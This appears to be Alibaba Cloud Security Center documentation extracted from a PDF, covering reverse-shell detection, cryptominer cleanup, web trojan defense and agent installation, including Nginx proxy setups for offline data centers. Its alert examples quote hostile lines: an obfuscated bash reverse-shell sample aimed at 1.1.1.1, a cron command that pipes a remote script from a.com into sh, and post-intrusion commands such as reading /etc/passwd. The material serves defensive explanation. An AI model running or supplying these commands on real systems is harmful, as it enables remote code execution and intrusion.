异常命令行为序列模型基于阿里云大数据实时计算平台,通过分析命令序列与攻击者获取Shell后行为相似 度来判定是否为反弹Shell。而异常Shell启动模型结合多维度特征以及机器历史行为综合判定产出告警。 以下是云安全中心已检测出的告警。

进程异常行为-Linux可疑命令序列 荷处理	备注 处理
该告警由如下引擎检测发现: 🛞 🛷 😳 🥺	
用户名: root	
父进程文件路径: /usr/bin/bash	
父进程ID: 5005	
父进程命令行:-bash	
进程路径: /usr/bin/bash	
进程ID: o	
命令行: /bin/sh -i	
操作详情:	
5 5855 curl myip.ipip.net	
5858 touch /tmp/t	
, 5859 cat /etc/passwd	
事件说明: 云安全中心检测到您的服务器上某进程执行了一系列可疑的命令,这些命令与攻击者入侵后通常会执行/ 相似,建议排查这些命令的父进程,可能为反弹shell、远控木马、存在漏洞的Web服务,或者是合法进程被注入了	的命令序列非常 「恶意代码。

云安全中心多维检测方案

攻击与防御技术总是在不断的对抗中升级,攻击技术任何单点的突破都可能形成稳定绕过防御技术的局面。 理论上任何一种反弹Shell检测都不是完美的,特别是第三类反弹Shell。云安全中心支持纵深检测,采用多 维度交叉检测反弹Shell方案,通过进程特征覆盖、文件描述符分析、命令行为序列、异常Shell启动、二进 制沙箱、脚本沙箱、流量特征覆盖、对抗行为检测共八项技术在不同入侵阶段埋点,从而最大程度保障检出 效果。



除了<mark>分类检测思想</mark>中介绍的更贴近反弹Shell本质的FD检测技术、从行为目的出发的异常命令行为序列检测技术、异常Shell启动检测和常规的命令、网络特征覆盖方案以外,云安全中心同时使用以下检测技术:

• 脚本沙箱

对于脚本类型的反弹Shell,云安全中心提供针对性的解决方案。 云安全中心会对落盘脚本文件进行文件落盘检测,检测的语言包括但不限于Bash、Python、Perl、Vbs、 PowerShell、Bat、JAR等。

"\${@~~}" "\${@^^}" \$BASH \${*%%\$9tcW\)zX} <<< "\${ "\${@~~}" \$'\162'''e\${*}v <<< '
}^*{\$ ") }^*{\$; }4S:\{\/CZ.!\?//@{\$ }^^@{\$ "}~~H7ONC{\$" s% f\"t"n""ir*
\$p}@!{\$
},*{\$ }L>JO%*{\$ && }ca\L&[\%%@{\$ '"'"'1&>0 3332/1.1.1.1/PCT/VED/ &> I- HSAB'"'"'=H7ONC
(\$" 1}#VDG~g/g:fii\//*{\$a"}~@{\$"v'"'"e'"''' }~*{\$ ' \${@~} \${@^}; \${*%%S9;fj\$
^Y})" \${*,,} \${@%r-,,}



云安全中心会对混淆类样本,通过每种语言的Trace模式,动态解混淆后进行检测。 近些年随着Java应用越来越多,在云上也出现一些利用JAR包进行反弹Shell的案例。云安全中心会对JAR等 打包类文件进行静态反编译并结合动态的运行进行多维度判定。



随着攻防对抗程度提升,无文件攻击越来越流行,云安全中心针对无文件类反弹Shell提供了相应检测方案。



恶意进程(云查杀)-反弹shell后门 待处理	备注 处理
该告警由如下引擎检测发现: 🗰 🛞 😚	
文件路径: /root/revershell	
恶意文件md5: 2a4763229ab47a22b32cf0!	
进程id: 1865	
描述: 检测到反弹shell的恶意后门程序。反弹shell是黑客常用的执行命令手段, 黑客通过该方法可以随时获得系统控制权或进行恶	意攻击。

• 流量特征分析

云安全中心覆盖常见Shell通信特征,辅助提升反弹Shell检测效果。

异常网络连接-异常网络流量 待处理	备注 处理	
该告警由如下引擎检测发现: 🐼 🐼 🚱 🝳 🔭		
攻击者:		
被攻击资产:		
类型:反弹Shell (Reverse Shell)		
网络流量内容:]0,1		
命令行: python		
进程路径: /usr/bin/python2.7		
事件说明: 检测模型通过分析您服务器的流量,发现存在异常的网络流量通信,可能是成功的漏洞利用、恶意软件通信、敏加 疑的代理隧道等,请根据告警详情信息做进一步判断处理。	惑信息泄露、可	

• 对抗行为检测

云安全中心覆盖常见绕过方式,如替换系统Shell、命令编码等,作为辅助手段提升检测效果。

敏感文件篡改-挪移系统文件 待处理	备注 处理
该告警由如下引擎检测发现: 🛞 🛷 🚱 😔	
告警原因: 模型监控发现一个非系统文件路径的文件hash,与常见的系统文件hash一致。	
告警的文件: /tmp/bbk	
系统文件: /usr/bin/ncat	
文件MD5: fd48f372b0a814108d6624deC	
事件说明: 检测模型发现您的服务器上游进程尝试挪移系统文件,可能是攻击者在入侵过程中,通过挪移被安全 来达到绕过部分检测逻辑的目的。	全软件监控的系统文件

11.挖矿程序处理最佳实践

本文以挖矿程序为例,介绍云安全中心在处理挖矿病毒的事前、事中、事后所提供的安全告警、拦截查杀、 溯源分析等服务。

前提条件

- 请在资产中心页面的服务器页签下,查看服务器的客户端(即云安全中心Agent)状态是否为开启,只 有云安全中心客户端的状态为开启,云安全中心才能防护该服务器。
- 如果服务器的客户端状态为暂停保护,则说明该服务器上的客户端已被关闭,云安全中心无法为该服务器 提供保护。您需要为该服务器开启保护。具体操作,请参见修改服务器保护状态。
- 如果服务器的客户端状态为离线,则说明该服务器上尚未安装云安全中心Agent,云安全中心无法为该服务器提供保护。您需要为该服务器安装云安全中心Agent。具体操作,请参见安装Agent。
- 如果您已为服务器成功安装云安全中心Agent,但在云安全中心控制台上该服务器的客户端状态仍为离 线,您需要排查客户端离线的原因。具体操作,请参见Agent离线排查。

限制条件

请确保您使用的是云安全中心防病毒版、高级版、企业版或旗舰版。防病毒版、高级版、企业版或旗舰版才 支持对您服务器中的挖矿程序进行处理。免费版仅支持安全告警检测,不支持安全告警处理。您可以通过购 买云安全中心防病毒版、高级版或企业版来使用安全告警处理的功能。更多信息,请参见文档购买云安全中 心。

点击此处立即购买云安全中心

免费试用

云安全中心为已购买免费版的用户提供7天免费试用旗舰版的活动。

如果您未购买过云安全中心,您还可以通过申请免费试用云安全中心的旗舰版,使用旗舰版处理挖矿程序。 开通免费试用云安全中心旗舰版的具体介绍,请参见文档开通免费试用。

点击此处免费试用云安全中心

挖矿程序的特征

- 挖矿程序会占用CPU进行超频运算,导致CPU严重损耗,并且影响服务器上的其他应用。
- 挖矿程序还具备蠕虫化特点,当安全边界被突破时,挖矿病毒会向内网渗透,并在被入侵的服务器上持久 化驻留以获取最大收益。
- 挖矿程序具有联动作用,在清理过程中会存在处理不及时或清理不干净导致挖矿病毒反复发生、出现恶意 脚本替换系统命令的现象,从而导致执行系统命令时触发恶意脚本执行(例如: xorddos)。因此,需要 在挖矿程序的一个执行周期内,尽快将被入侵服务器上的木马程序和持续化后门清理干净,否则容易导致 挖矿病毒频繁复发。

如何判断资产中是否存在挖矿威胁

如果您服务器的CPU使用率明显升高,例如达到80%以上,并且出现未知进程持续向外发送网络包的情况, 可以判定您的服务器中存在挖矿威胁。详细内容,请参见如何判断资产中是否存在挖矿威胁?

云安全中心用户处理挖矿程序

- 1. 登录云安全中心控制台安全告警页面。
- 2. 在安全告警列表中定位到挖矿程序,单击操作列的处理。

当出现挖矿事件时,云安全中心会产生挖矿程序的告警事件。

↓ 注意 强烈建议您在控制台出现告警事件、或安全治理通知后,使用病毒防御与扫描功能清理 隐藏、持久化的恶意文件。具体操作,请参见病毒防御。

3. 对确认需要查杀的挖矿程序,选中**病毒查杀**,然后选中**隔离该进程的源文件、结束该进程的运行**,并 单击**立即处理**,防止该程序再次启动。

云安全中心支持**同时处理相同告警**功能,如果您想批量处理相同规则或类型触发的告警,您可以使用 此功能。

4. 对挖矿事件产生的其他衍生告警(例如:矿池通信行为),执行阻断操作。

云安全中心通过生成对应的策略防止服务器访问矿池,确保您有充足的时间对安全事件进行处理。您也可以手动将矿池IP加入安全组禁用。

5. 查看进程行为异常告警,确认是否存在异常的计划任务。

进程异常行为-Linux计划任务执行异常指令 待处理	备注	处理
该告警由如下引擎检测发现: 🕺 🖉 🚭 🔍 😕		
进程名称: bash		
进程路径: /usr/bin/bash		
进程id: 14,075		
用户名: root		
命令行参数: /bin/sh -c curl -fsSL http://a.com/init.sh sh > /dev/null 2>&1		
事件说明: 黑客入侵服务器后,为了让恶意后门程序能持久化运行,黑客常常将恶 b、systemd等计划任务。如果该指令不是您自己部署,请及时排查入侵原因。	思意SHELL脚本写,	∖cronta
解决方案: 建议立即及时排查系统/etc/crontab、/var/spool/cron/、/var/spool/cro 否存在可疑计划任务文件,并加固系统密码。	on/crontabs/等目	最下是

6. 开启病毒拦截功能。

针对无法及时清理服务器上残留的挖矿程序或清理不干净导致复发的情况,云安全中心提供的病毒拦截 功能可对挖矿程序进行精准拦截,在事前抑制挖矿事件的发生。如何开启病毒拦截功能,请参见<u>主动防</u> 御。

精准防御-挖矿程序 拦截成功	备注 处理
✓ 加白规则: 1. 恶意文件md5 正则 7[a-z0-9]{31}	
该告警由如下引擎检测发现: 🛞 💮 😋 📩	
文件路径: /root/test/8af	
恶意文件md5: 8afed322	
进程id: 3861	
描述: 通常黑客入侵后会植入挖矿程序赚取收益,该类程序占用CPU等资源,影响用户正常业务,危害较大。且该程序可能还 行为,或伪装成系统程序以躲避检测。如果发现该文件不存在,请检查是否存在可疑进程、定时任务或启动项。具体详情可: ttps://helpcdn.aliyun.com/knowledge_detail/41206.html	存在自删除 查看帮助: h

您可以使用云安全中心的病毒防护功能扫描您的资产,病毒扫描的结果会显示在安全告警处理页面。
 另外,病毒扫描将清理恶意文件的一些持久化行为,例如:自启动项、定时任务。具体操作,请参见病毒防御。

⑦ 说明 病毒扫描结束后,请及时处理安全告警页面上报的告警事件,以确保您服务器的安全。

o 您还可以通过云安全中心提供的入侵溯源功能,详细了解挖矿程序入侵的过程和链路。



非云安全中心用户处理挖矿程序

挖矿程序为了最大程度获取利益,会存放大量的持久化后门,导致病毒杀不死或难以清理。如果您在未购买 云安全中心服务的情况下遇到挖矿病毒,可以采取如下措施排查和处理。

Linux系统

1. 执行以下命令查看挖矿进程的执行文件链接。

ls -1 /proc/xxx/exe // xxx表示该进程的PID。

- 2. 清除挖矿进程的执行文件。
- 3. 在高CPU消耗的进程中定位到挖矿进程,并关闭该进程。
- 4. 检查并清除您服务器的防火墙中存在挖矿程序的矿池地址。
 - i. 执行以下命令查看是否存在业务范围之外的可疑通信地址和开放端口。

iptables -L -n

root@i		`∎dpcZ ~]# iptable	s-L-n					
hain INPU	F (policy ACCE	PT)						
arget	prot opt sour	ce	destination					
CCEPT	tcp 0.0.	0.0/0	0.0.0.0/0	tcp dpt:8888				
hain FORW	hain FORWARD (policy ACCEPT)							
arget	prot opt sour	ce	destination					
hain OUTPU	JT (policy ACC	CEPT)						
arget root@i	prot opt sour	ce dpc7 ∼1#	destination					
100.61		aper 1"						

ii. 执行以下命令清除恶意矿池地址。

vi /etc/sysconfig/iptables

5. 执行以下命令排查是否存在定时任务。

crontab -1



您可以根据排查的结果,对可疑的定时任务文件进行处理,防止二次入侵。

6. 执行以下命令检查SSH公钥中是否存在挖矿病毒, 防止出现持续后门。

cat .ssh/authorized_keys

7. 查看其他服务器中是否存在挖矿行为,防止挖矿病毒重复感染内网中的其他服务器。

Windows系统

1. 在PowerShell中执行以下命令,通过CPU占用情况排查可疑的挖矿进程。

```
ps | sort -des cpu
While(1) {ps | sort -des cpu | select -f 15 | ft -a; sleep 1; cls}
```

2. 执行以下命令, 查看挖矿进程的磁盘文件、进程启动命令的参数。

wmic process where processid=xxx get processid,executablepath,commandline,name //xx x表进程pid

- 3. 结束挖矿进程,清除挖矿文件。
- 4. 执行以下命令,检查主机连接的可疑网络端口。

5. 执行以下命令,检查服务器中hosts文件是否存在挖矿程序的矿池地址。

type C:\Windows\System32\drivers\etc\hosts

6. 执行以下命令, 排查是否存在挖矿程序设定的计划任务。

schtasks /query

其他方案

如果病毒入侵较深,关联到系统底层组件,很难手动排查和清除。强烈建议您在备份重要数据后,重置服务器的系统,可确保完全清理挖矿程序。操作步骤如下:

- 1. 创建快照备份服务器上的重要数据。具体操作,请参见创建一个云盘快照。
- 2. 初始化服务器的操作系统。具体操作,请参见重新初始化系统盘。
- 3. 使用快照生成云盘。具体操作,请参见使用快照创建云盘。
- 4. 挂载云盘到重装系统后的服务器上。具体操作,请参见挂载数据盘。

同时, 阿里云也提供安全应急响应服务, 由专业的安全技术人员来帮助您解决, 应急响应可提供的内容如下:

- 帮您全面清理系统中存在的木马、病毒、异常账号、异常文件、WebShell、暗链等。
- 分析黑客入侵手法,查找入侵原因。
- 指导用户进行安全加固。

应急响应服务的详细信息,请参见应急响应服务。

12.防御挂马攻击最佳实践

本文为您介绍挂马攻击的相关信息、如何查找并清除挂马文件以及如何防御挂马攻击。

什么是挂马攻击

挂马攻击是指攻击者在攻击成功并获得了网站控制权后,在网站的网页中嵌入恶意代码。攻击者通常会使用 if rame框架挂马、JS挂马、Body挂马、隐蔽挂马、CSS挂马等方式。

当网站用户访问被攻击成功的网页时,嵌入的恶意代码利用浏览器本身的漏洞、第三方ActiveX漏洞或其它插件(例如Flash、PDF插件等)漏洞,在用户不知情的情况下下载并执行恶意木马。

挂马攻击有什么危害

网站被挂马攻击后,表示黑客已成功入侵该网站。黑客可以获取该网站用户的账号密码、业务数据等敏感数据。如果网站用户访问了被攻击成功的网站,用户计算机就可能被植入恶意木马病毒,这些病毒会盗取用户的各类账号密码和数据,例如网银账户、社交账号和密码等。恶意木马病毒还可能会破坏被病毒感染计算机的本地数据,给用户的信息资产带来巨大的损失。因此,网站被挂马不仅会影响网站的公共形象,还可能会造成该网站用户的计算机系统故障和存储数据泄露。

如何查找并清除挂马文件

网站被挂马攻击是指黑客通过漏洞成功入侵网站,并在网站服务器文件系统或代码内植入了恶意代码或文件。建议您采用以下方法查找并清除挂马文件:

- 如果是特定的恶意代码,建议您快速根据URL目录找到挂马文件,然后删除。
- 一般操作系统或应用代码文件成百上千,靠人工很难识别挂马文件,建议您使用云安全中心自动化检测和 处理挂马文件。
- 您也可以使用人工专家应急响应服务,排查入侵原因,找到漏洞并清理木马,确保系统安全可靠后再加强 防护措施。避免二次入侵或重复发生挂马事件。

如何防御挂马攻击

及时修复网站系统和网站所在服务器的各类漏洞,可以降低网站被挂马攻击的风险。网站被挂马攻击会产生 较大的危害主要是因为攻击者在攻击成功后,可以利用被篡改网页、浏览器或操作系统的漏洞、网页木马的 下载执行和恶意程序的下载执行等方式,进一步扩大攻击范围。因此,您需要从网站系统各个层级去防护网 站,抵御挂马入侵。下图是一般网站系统的架构。



建议您采用以下解决方法:

• 网络安全层

- 建议您使用ECS安全组、SLB白名单、云防火墙等服务限制不必要的服务端口暴露在外网,防止暴露的服务 器端口被黑客利用。
- 主机系统层面
 - 建议您使用堡垒机管理ECS的登录方式,并针对不同运维人员按照最小授权原则进行精细化授权。
 - 为云账号配置强密码。安全密码建议设置为8位以上,必须包括大写字母、小写字母、数字和特殊字符。同时建议每隔几个月更换一次密码,保证安全性。建议开通多因素认证(MFA)或SSH Key凭证登录。
 - 关注安全漏洞情报,例如关注阿里云官网发布的安全漏洞公告。定期检测并修复网站本身以及网站所在 服务端环境的各类漏洞,及时更新操作系统、应用服务软件补丁。
 - 建议您开通云安全中心服务,使用云安全中心检测并修复您服务器上的安全风险、不安全配置项、操作系统漏洞、中间件漏洞等安全风险。
 - 加强文件访问权限管理。设置敏感目录访问权限,限制修改目录的脚本执行权限,遵循最小授权原则配置文件系统的访问和修改权限。

● 数据库层面

- 强烈建议不要使用数据库Web管理工具来管理数据库,也不要让Web管理系统直接对公网开放。
- 配置网络访问控制策略, 仅允许应用服务器访问数据库服务, 禁止数据库服务端口对公网开放。
- 配置复杂密码,对数据库服务进行加固。

• 应用安全层面

- 对Web应用中间件进行安全加固。
- ・ 在业务代码上线前,进行代码安全测试、白盒代码审计等工作,并在修复已发现漏洞后,再上线发布,
 防止业务代码上线后黑客利用存在的漏洞入侵业务系统。
- 业务系统上线前或上线后,使用漏洞扫描服务定期对网站和Web业务系统进行漏洞扫描,及时处理存在的安全漏洞。
- 排查程序存在的漏洞,并及时修复漏洞。您可以使用应急响应服务协助您排查漏洞及入侵原因,同时可以使用Web应用防火墙保护您的Web应用。Web应用防火墙可以帮助您拦截外部攻击行为,降低您的Web应用被黑客入侵的可能性。

13.阿里云服务器批量安装Agent

本文介绍在阿里云服务器上批量安装Agent的方法。

背景信息

您需要有带ECS管理权限的账号的AK完成批量安装云助手,才能批量安装云安全中心Agent。

操作步骤

- 1. 下载阿里云CLI工具。
- 2. 执行以下命令, 配置阿里云CLI的认证信息。如未完成该配置, 您将无法使用阿里云CLI安装云助手。

aliyun configure

ali-6c96cfe0d229:Downloads jack\$ aliyun configure
Configuring profile '' in '' authenticate mode
Access Key Id [***********1ho]:
Access Key Secret [*********************************CDu]:
Default Region Id [cn-hangzhou]:
Default Output Format [json]: json (Only support json))
Default Language [zhlen] zh:
Saving profile[]Done.
available regions:
cn-qingdao
cn-beijing
cn-zhangjiakou
cn-huhehaote
cn-hangzhou
cn-shanghai
cn-shenzhen
cn-chengdu
cn-hongkong
ap-northeast-1
ap-southeast-1
ap-southeast-2
ap-southeast-3
ap-southeast-5
ap-south-1
us-east-1
us-west-1
eu-west-1
me-east-1
eu-central-1
Configure Done!!!
+88888888888888888888888888888888
······································
······································

3. 执行以下CLI命令获取需要安装云助手的ECS的实例ID和Region ID。

```
aliyun ecs DescribeRegions #获取Region ID列表。
aliyun ecs DescribeInstances --RegionId [cn-hongkong] #获取实例列表,每个region需要查询一次。
```

```
ali-6c96cfe0d229:Downloads jack$ aliyun ecs DescribeInstances --RegionId cn-hongkong
        "PageNumber": 1,
        "TotalCount": 2,
        "PageSize": 10,
        "RequestId": "1547E303-4FB1-4FAC-BF1D-2485AD4649CA",
        "Instances": {
                "Instance": [
                                 "ImageId": "win2008r2_64_ent_sp1_zh-cn_40G_alibase_20190318.vhd",
                                 "VlanId": "",
                                  "EipAddress": {
                                         "IpAddress": "",
"AllocationId": "",
                                         "InternetChargeType": ""
                                 },
                                 "ZoneId": "cn-hongkong-b",
                                 "IoOptimized": true,
                                  "SerialNumber": "eaf191eb-51ac-4986-bfab-a544fe5a4392",
                                 "Cpu": 1,
                                 "Memory": 2048,
                                 "DeviceAvailable": true,
                                 "SecurityGroupIds": {
                                          "SecurityGroupId": [
                                                   "sg-j6c8tug50dd3m6pcwzkr"
                                          ]
                                 },
"SaleCycle": "",
                                 "AutoReleaseTime": "",
                                  "ResourceGroupId": "",
                                 "OSType": "windows",
"OSName": "Windows Server 2008 R2 企业版 64位中文版",
                                 "InstanceNetworkType": "vpc",
                                 "HostName": "iZjjpt127asc1sZ",
                                 "CreationTime": "2019-05-09T05:48Z",
                                 "EcsCapacityReservationAttr": {
                                          "CapacityReservationPreference": "",
                                         "CapacityReservationId": "
                                 },
                                 "RegionId": "cn-hongkong",
                                 "DeletionProtection": false,
                                  "OperationLocks": {
                                         "LockReason": []
                                 },
                                 "ExpiredTime": "2020-05-09T16:00Z",
                                 "InnerIpAddress": {
                                          "IpAddress": []
                                 },
"InstanceTypeFamily": "ecs.n4",
```

4. 执行以下CLI命令安装云助手。阿里云CLI支持同时对多台ECS安装云助手。

aliyun ecs InstallCloudAssistant --RegionId [TheRegionId] --InstanceId.N [i-bp1g6zv0ce8 ogXXXXXp] #**对多台**ECS**安装云助手时,请按顺序将**N替换成需要ECS**的数量,并用第3步中查询到的实例**ID替 换i-bp1g6zv0ce8ogXXXXXp。

⑦ 说明 您可执行 aliyun ecs DescribeCloudAssistantStatus --RegionId TheRegionId --In stanceId.1 i-bp1g6zv0ce8ogXXXXXp --output cols=CloudAssistantStatus 命令,查询ECS是否
 已安装了云助手。详细内容,请参见安装云助手客户端。

5. 登录云安全中心控制台, 在设置 > 安装/卸载插件页面为多台ECS批量安装Agent。

282 年90 / RE 设置						安全配置从这里开始
设置 通知 安装/卸载插件						
待安装客户端 客户端安装指南						抑频客户端
③ 您有5台服务器还没有安装客户课,建议您安装客户端充分利用云安金中心守护您的服务器安全。						×
未安装客户摊服务器 5 个						
全部 ン 輸入股务器Pr成名称 Q						c
■ 服务機高称	私网IP	公网 IP	操作系统	地域	状态	操作
		1000	Windows	华东1 (杭州)	未安装	安装客户端
c	1000		👌 Linux	华东1 (杭州)	未安装	*** 💬
			👌 Linux	华东2 (上海)	未安装	\$\$\$ 7
			🛆 Linux	华东2 (上海)	未安装	安装客户调
			🛆 Linux	华东1 (杭州)	未安装	安装客户端
				共 5 条数据 每页显示 20	× <	上一页 1 下一页 >

② 说明 Agent安装成功的服务器将不会在**安装/卸载插件**页面展示,您可在资产中心 > 服务器页 签下,查看到该服务器的服务端状态为开启。

相关文档

- Agent离线排查
- 安装Agent

> 文档版本: 20220621

14.非阿里云服务器安装Agent

本文介绍了非阿里云ECS服务器安装云安全中心Agent的方法。

背景信息

云安全中心支持阿里云ECS服务器和非阿里云服务器(覆盖各大主流与非主流厂商的云服务器,如AWS 等)。阿里云ECS和非阿里云服务器都必须安装Agent,才能获得云安全中心的防护。

未安装Agent插件的服务器将不受云安全中心保护,控制台页面也不会显示该资产的任何漏洞、告警、基线漏洞和资产指纹等数据。

非阿里云服务器不支持一键自动安装,只支持手动安装Agent。

操作步骤

- 1. 登录云安全中心控制台。
- 2. 在左侧导航栏,单击设置。
- 3. 在设置页面, 单击安装/卸载插件页签。
- 4. 单击客户端安装指南页签。

客户端安装指南页面查为您提供4条默认命令。如果您无需生成命令镜像或不需要应用该命令的服务器 自动添加到指定的资产分组中,您可以按照自己服务器和操作系统类型选择对应的安装命令,直接使用 该默认命令安装到服务器中。

5. (可选)在客户端安装指南页签中,单击新增安装命令,手动创建安装Agent的命令。

↓ 注意 如果您使用云安全中心提供的默认命令安装到客户端中,您可以跳过本步骤。

您可以通过新增安装命令,实现以下两个目的:

- 创建命令镜像,使用该命令镜像批量预装到服务器中。
- 为新增的安装命令绑定资产分组,后续使用该命令安装Agent插件的服务器会自动加到该资产分组中。

i. 在新增安装命令对话框中,配置命令的基本信息。 安装命令的配置项说明如下:

配置项	说明		
过期时间	该命令过期的时间。		
服务商	服务器所属的服务提供商。		
默认分组	该安装命令生效的服务器分组。		
操作系统	命令应用的操作系统类型。可选操作系统类型为Windows、Linux、 Windows 2003。		
制作镜像系统	是否需要制作镜像文件。可选项说明: ■ 选择是:云安全中心会创建命令的镜像文件,您无需在每台服务器 中重复执行Agent安装命令,就可批量预装到其他服务器中。		
	⑦ 说明 在服务器中运行了该镜像命令后,将仅下载Agent 文件,不启动Agent进程。如果您需要对该服务器进行防护, 必须重启服务器,Agent进程才能启动,该服务器才能受到云 安全中心的防护。		
	■ 选择否:直接生成安装命令。		

- ii. 单击确定,生成一条Agent安装命令,并复制该命令。
 您可以在客户端安装指南页签中,查看已创建的Agent安装命令。
- 6. 使用有管理员权限的账号登录需要安装Agent的服务器。

根据服务器的操作类型不同,执行安装命令的界面有所不同:

- Windows系统:在命令提示符(CMD)中,执行已复制的安装命令,即可完成Agent文件的下载及 安装。
- Linux系统:在服务器的命令行界面,执行已复制的安装命令,即可完成Agent文件的下载及安装。

↓ 注意 该安装命令包含从阿里云站点下载最新的Agent插件,如您使用的是非阿里云服务器请确认您的服务器已连接公网。

Agent插件安装完成约五分钟后,您即可在云安全中心管理控制台中查看您服务器的客户端在线情况:

- 阿里云服务器客户端会从关闭变成开启。
- 非阿里云服务器将会被添加至您的服务器列表中。

○ 注意 由于网络环境的原因,非阿里云服务器安装Agent后服务器信息同步可能会出现延迟,导致云安全中心控制台资产中心页面不会及时展示服务器的信息。这种情况下,您需要在资产中心的服务器页签下单击同步最新资产,将该服务器的信息手动同步到资产中心。

非阿里云服务器批量安装Agent

- 1. 登录云安全中心控制台。
- 2. 在左侧导航栏,单击设置。

- 3. 在设置页面, 单击安装/卸载插件页签。
- 4. 在安装/卸载插件页签下,单击新增安装命令。
- 5. 在新增安装命令对话框中, 配置安装命令。

新增安装命令			×
过期时间	选择日期	⊟	
服务商	请选择	\checkmark	
默认分组	请选择	\checkmark	
操作系统	O Windows O Linux	O windows-2003	
制作镜像系统	请选择	\checkmark	
		确定	取当
		WORE	-613

配置项	说明
过期时间	该命令过期的时间。
服务商	服务器所属的服务提供商。
默认分组	该安装命令生效的服务器分组。
操作系统	命令应用的操作系统类型。可选操作系统类型为Windows、Linux、 Windows 2003。
制作镜像系统	 是否需要制作镜像文件。可选项说明: 选择是:云安全中心会创建命令的镜像文件,您无需在每台服务器中重复执行Agent安装命令,就可批量预装到其他服务器中。 选择否:直接生成安装命令。

6. 单击**确定**。

7. 打开堡垒机或您的自建运维管控系统(例如:Xshell, SecureCRT等),批量下发安装命令到您的服务 器上运行,即可完成Agent文件的下载及安装。

Agent插件安装完成约五分钟后,您即可在云安全中心管理控制台中查看到您非阿里云服务器将会被添加至您的服务器列表中。

↓ 注意 由于网络环境的原因,非阿里云服务器安装Agent后服务器信息同步可能会出现延迟, 导致云安全中心控制台资产中心页面不会及时展示服务器的信息。这种情况下,您需要在资产中 心的服务器页签下单击同步最新资产,将该服务器的信息手动同步到资产中心。

相关文档

- Agent离线排查
- 安装Agent

15.线下IDC使用云安全中心最佳实践

云安全中心支持对阿里云ECS服务器、非阿里云服务器和线下IDC服务器提供安全防护。本文介绍如何将线下 IDC服务器接入云安全中心。

网络流向图



操作流程

如果您需要在线下无法访问公网的IDC服务器上部署云安全中心Agent并实现在阿里云控制台统一管控线下 IDC服务器,您需要按照以下流程进行操作:

- 1. 搭建IDC内部Proxy集群,实现线下IDC服务器与公网的通信。
- 2. 修改hosts文件、本地DNS连通Proxy集群和线下IDC内的服务器。
- 3. 在IDC内的服务器上安装云安全中心Agent客户端,开启云安全中心对IDC服务器的安全防护。

搭建Proxy反向代理集群

云安全中心客户端通过两个域名分别连接Proxy集群中的长连接服务器和HTTP服务器。

↓ 注意 长连接代理和HTTP代理需要分别部署在不同代理服务器上,即至少需要两台服务器搭建 Proxy集群。

• 配置长连接代理服务器

○ 至少准备一台用于长连接代理的服务器,并确认服务器上已安装GCC和Zlib-devel。

⑦ 说明 您可以根据IDC服务器规模来确定用于长连接的代理服务器数量。如果您的服务器数量 较多,您可以准备多台用于长连接代理的服务器。

已下载支持反向代理的Nginx版本。下载支持反向代理的Nginx版本,请单击支持反向代理的Nginx版本下载。

操作步骤

```
tar -xvf nginx-1.9.0
cd nginx-1.9.0
./configure --without-http_rewrite_module --with-stream
make
make install
```

ii. 在Nginx配置文件所在目录下,参考以下内容修改nginx.conf文件。

```
#user nobody;
worker processes auto;
error log logs/error.log;
#error log logs/error.log notice;
#error_log logs/error.log info;
          logs/nginx.pid;
#pid
events {
         epoll;
   use
   worker connections 60000;
}
stream {
       server {
           listen 80;
           proxy timeout 20m;
           proxy connect timeout 60s;
           proxy_pass app;
        }
       upstream app {
          server jsrv.aegis.aliyun.com:80;
        }
}
```

iii. 配置文件修改完成后,重新启动Nginx。

- 配置HTTP代理服务器 准备工作
 - 准备至少一台用于HTTP代理的服务器。

⑦ 说明 您可以根据IDC服务器规模来确定用于HTTP代理的服务器数量。如果您的服务器数量较多,您可以准备多台用于HTTP代理的服务器。

已下载支持反向代理的Nginx版本。下载支持反向代理的Nginx版本,请单击支持反向代理的Nginx版本下载。

操作步骤

i. HTTP连接使用四层代理。下载Nginx后,执行以下编译命令安装Nginx。执行编译命令时需要加上 - with-stream 参数。

```
sudo ./configure --without-http_rewrite_module --with-stream
sudo make
sudo make install
```

ii. 在Nginx配置文件所在目录下,参考以下内容修改nginx.conf文件。

```
#user nobody;
worker processes auto;
error log logs/error.log;
#error log logs/error.log notice;
#error log logs/error.log info;
       logs/nginx.pid;
#pid
events {
  use epoll;
   worker connections 60000;
}
stream {
       upstream updatessl {
           server update.aegis.aliyun.com:443;
       }
       server {
          listen 443;
           proxy connect timeout 60s;
           proxy pass updatessl;
       }
       upstream updatehttp {
           server update.aegis.aliyun.com:80;
       }
       server {
          listen 80;
           proxy_connect_timeout 60s;
           proxy pass updatehttp;
       }
  }
```

iii. 配置文件修改完成后,重新启动Nginx。

Proxy集群连通IDC内部服务器

以下方法均可使Proxy集群连通IDC内部服务器,您可以选择其中任意一种。

● 修改线下IDC服务器的hosts文件

修改IDC服务器的*hosts*文件,将本地对云安全中心域名的访问转到Proxy集群。您需要在*hosts*文件内添加 域名绑定记录,将云安全中心使用的所有域名绑定为Proxy地址。以下是您需要添加的域名绑定记录,其 中xx.xx.xx入IDC内服务器可访问的Proxy集群地址。

↓ 注意 jsrv相关域名对应host绑定长连接代理服务器地址; alicdn和 updat e相关域名对应host绑定HTTP代理服务器地址。

```
xx.xx.xx jsrv.aegis.aliyun.com
xx.xx.xx.xx jsrv2.aegis.aliyun.com
xx.xx.xx.xx jsrv3.aegis.aliyun.com
xx.xx.xx.xx jsrv4.aegis.aliyun.com
xx.xx.xx.xx jsrv5.aegis.aliyun.com
xx.xx.xx.xx aegis.alicdn.com
xx.xx.xx.xx update.aegis.aliyun.com
xx.xx.xx.xx update2.aegis.aliyun.com
xx.xx.xx.xx update3.aegis.aliyun.com
xx.xx.xx.xx update4.aegis.aliyun.com
```

● 修改线下IDC的本地DNS服务

修改线下IDC的本地DNS服务,使*jsrv.aegis.aliyun.com*和*update.aegis.aliyun.com*两个域名指向Proxy集群的地址。

IDC服务器安装云安全中心Agent

IDC服务器安装云安全中心Agent后,云安全中心才能防护您的服务器。IDC服务器必须通过安装程序 (Windows)或脚本命令(Linux)安装云安全中心Agent。详细操作指导,请参见在服务器中手动安装 Agent。

16.防勒索最佳实践

勒索病毒入侵云服务器资源后会对数据进行加密勒索,导致业务突然中断、数据泄露和数据丢失,带来严重 的业务风险。本文为您提供相应防护方案,帮助您防护云服务器资源,远离加密勒索病毒。

入侵原因分析

经调查分析,大多数情况下,云服务器资源被勒索病毒入侵,是由于使用云服务器资源时存在以下不安全因素:

- 关键账号存在弱口令或无认证机制
 - 服务器关键账号的(root、Administrator)密码简单或无密码。
 - 数据库(Redis、MongoDB、MySQL、MS SQL Server)等重要业务使用的密码简单或无密码。
- 无访问控制策略,业务暴露在互联网上
